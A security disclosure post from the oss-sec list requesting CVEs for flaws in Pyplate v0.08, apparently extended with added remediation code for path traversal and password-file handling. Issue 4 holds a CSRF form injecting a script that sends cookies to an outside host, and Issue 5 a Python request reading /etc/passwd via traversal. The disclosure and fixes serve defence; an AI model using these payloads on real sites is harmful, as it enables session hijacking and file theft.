oss-sec mailing list archives
CVE request: Pyplate multiple vulnerabilities
From: Henri Salo <henri () nerv fi>
Date: Wed, 14 May 2014 14:21:21 +0300
Hello list,

My friend Teemu V. "requested" a security audit for Pyplate. While quickly checking the quality of this software I noticed the following issues. This is not a full security audit as I don't have much free time.

Tested version: v0.08 (still beta)
Vendor notification: 2014-05-13

Issue 1. The installation instructions tell the user to execute the following commands without checking any checksums or similar:
wget http://pyplate.com/pyplate_install.sh
chmod +x ./pyplate_install.sh
sudo ./pyplate_install.sh
Issue 2. File /usr/lib/cgi-bin/create_passwd_file.py creates passwd.db for the admin user password with world-readable permissions. I like that salt :]

salt="bla"

hash=crypt.crypt(random_string,'$6$'+salt+'$')
usercredentials="admin:"+hash

passwdf=open("./passwd.db",'w')
passwdf.write(usercredentials)
passwdf.close()

-rw-r--r-- 1 www-data www-data 99 May 13 20:45 /usr/share/pyplate/passwd.db

Issue 3. The application is not using the HttpOnly (nor Secure) flag on the cookie "id".

Issue 4. CSRF + XSS with cookie-stealing PoC:

<html>
<body>
<!-- the injected script uses single quotes so it survives inside the value="..." attribute -->
<form action="http://example.com/admin/addScript.py" method="POST">
<input type="hidden" name="title" value="<script>new Image().src='http://bugs.fi/evil.py?cookie='+encodeURI(document.cookie);</script>" />
<input type="hidden" name="file" value="bugs" />
<input type="hidden" name="category" value="/" />
<input type="hidden" name="post" value="<p>bugs</p> " />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="new" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

There is no CSRF protection and most of the admin functionality contains stored XSS issues.

Issue 5. File /usr/lib/cgi-bin/download.py is used to download a backup file from the installation after the admin has created it in the web UI. Note the comment.

# need to check that the filename doesn't contain slashes
...
path = pyplate.getCMSRoot() + "/backup/" + filename
file = open (path, 'rb')

Normally the HTTP POST message looks like:

"""
POST /cgi-bin/download.py HTTP/1.1
Host: 10.0.0.53
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.53/admin/manage_backups.py
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

filename=backup_2014.05.13.223720.tar.gz
"""

An attacker can use this without authentication to download arbitrary files from the system. The file needs to be readable by the web server process. PoC for /etc/passwd below:

"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

# traversal out of <CMSRoot>/backup/ up to the filesystem root
payload = {'filename': '../../../../etc/passwd'}
r = requests.post('http://example.org/cgi-bin/download.py', data=payload)
print(r.text)
"""

If the author responds with a fixed version I can coordinate this and send email to the abuse@ address for all users (which is not that many currently).

---
Henri Salo
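The traversal in Issue 5 comes from joining an unchecked POST parameter onto a fixed directory. Below is an added example (editor's code, not Pyplate's download.py) that places the vulnerable concatenation next to a hardened replacement. Assumptions: the install root is /usr/share/pyplate as seen in the advisory, and backup names follow the backup_YYYY.MM.DD.HHMMSS.tar.gz shape of the sample request, so the hardened version uses that as an allowlist on top of a lexical containment check. The handle_download dispatcher is hypothetical and only illustrates that an admin check must come before the filename is examined, since the script is reachable unauthenticated.

```python
import posixpath
import re

# Install root observed in the advisory (what pyplate.getCMSRoot() returns there).
CMS_ROOT = "/usr/share/pyplate"

# Backups are named like backup_2014.05.13.223720.tar.gz in the sample request,
# so an allowlist of exactly that shape is the narrowest check available.
BACKUP_NAME = re.compile(r"backup_\d{4}\.\d{2}\.\d{2}\.\d{6}\.tar\.gz")


def vulnerable_backup_path(filename):
    """The concatenation download.py performs, normalised to show where it lands."""
    return posixpath.normpath(CMS_ROOT + "/backup/" + filename)


def safe_backup_path(filename):
    """Return the path to serve, or raise ValueError for anything outside backup/.

    Two independent checks: an allowlist on the name, and a lexical containment
    check on the joined path (the slash check the original comment asked for).
    Either one alone stops the PoC; keeping both means a later change to the
    name pattern cannot silently reopen the traversal.
    """
    if not isinstance(filename, str) or not BACKUP_NAME.fullmatch(filename):
        raise ValueError("unexpected backup filename: %r" % (filename,))
    base = posixpath.join(CMS_ROOT, "backup")
    path = posixpath.normpath(posixpath.join(base, filename))
    if "/" in filename or posixpath.dirname(path) != base:
        raise ValueError("filename escapes the backup directory: %r" % (filename,))
    return path


def download_allowed(filename):
    """True if safe_backup_path() accepts the name."""
    try:
        safe_backup_path(filename)
    except ValueError:
        return False
    return True


def handle_download(is_admin, filename):
    """Hypothetical CGI dispatcher returning (status, path).

    Authentication is decided before the filename is looked at, because the
    real download.py answers unauthenticated requests.
    """
    if not is_admin:
        return 403, None
    try:
        return 200, safe_backup_path(filename)
    except ValueError:
        return 400, None


if __name__ == "__main__":
    for name in ("backup_2014.05.13.223720.tar.gz", "../../../../etc/passwd"):
        print("%-35s vulnerable -> %s" % (name, vulnerable_backup_path(name)))
        print("%-35s hardened   -> %s" % (name, handle_download(True, name)))
```

The containment check is deliberately lexical (posixpath.normpath) so the example runs without touching the filesystem; on a real server, resolving with os.path.realpath before comparing also covers symlinks planted inside backup/.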
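Issue 2 has two separate defects: a constant salt and a credentials file created with the process umask, which left it 0644. The added example below (editor's code, not Pyplate's create_passwd_file.py) shows one way to do both parts properly: a per-password random salt with PBKDF2-HMAC-SHA256 from the standard library instead of crypt, and a file opened with an explicit 0600 mode and O_EXCL so an existing file is never silently overwritten. The record format and iteration count are assumptions for the example; file_is_world_readable is the check a reviewer would run against the result.

```python
import hashlib
import hmac
import os
import secrets
import stat
import tempfile

ITERATIONS = 200_000  # PBKDF2 work factor; assumed value, tune for the host


def hash_password(password, salt=None, iterations=ITERATIONS):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt (hex) unless one is given.

    The record format 'pbkdf2_sha256$iterations$salt$digest' is this example's
    own, chosen so verification can recover the parameters from the record.
    """
    if salt is None:
        salt = secrets.token_hex(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt), iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt, digest.hex())


def create_passwd_file(path, password, user="admin"):
    """Write 'user:record' readable by the owner only.

    O_EXCL refuses to clobber an existing passwd.db; the explicit mode makes the
    result independent of the caller's umask. The file still belongs to whoever
    runs the script (www-data in the advisory), which is the account that has to
    read it.
    """
    record = "%s:%s\n" % (user, hash_password(password))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(record)
    os.chmod(path, 0o600)  # belt and braces against default ACLs on the directory
    return path


def verify_password(path, user, password):
    """Constant-time comparison of the stored record against a fresh derivation."""
    with open(path) as fh:
        for line in fh:
            name, _, record = line.rstrip("\n").partition(":")
            if name != user:
                continue
            parts = record.split("$")
            if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
                return False
            expected = hash_password(password, parts[2], int(parts[1]))
            return hmac.compare_digest(expected, record)
    return False


def file_is_world_readable(path):
    """The check that flags the advisory's -rw-r--r-- passwd.db."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def run_demo(password="hunter2"):
    """Create a throwaway passwd.db and report its mode and verification results."""
    with tempfile.TemporaryDirectory() as tmp:
        path = create_passwd_file(os.path.join(tmp, "passwd.db"), password)
        return {
            "mode": stat.S_IMODE(os.stat(path).st_mode),
            "world_readable": file_is_world_readable(path),
            "good": verify_password(path, "admin", password),
            "bad": verify_password(path, "admin", password + "x"),
            "wrong_user": verify_password(path, "root", password),
        }


if __name__ == "__main__":
    print(run_demo())
```

Two identical passwords now produce different records because the salt differs, so a leaked passwd.db no longer lets an attacker reuse a single precomputed table, and the 0600 mode means the leak requires the web server's own privileges rather than any local account.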
Current thread:
- CVE request: Pyplate multiple vulnerabilities Henri Salo (May 14)
- Re: CVE request: Pyplate multiple vulnerabilities cve-assign (May 23)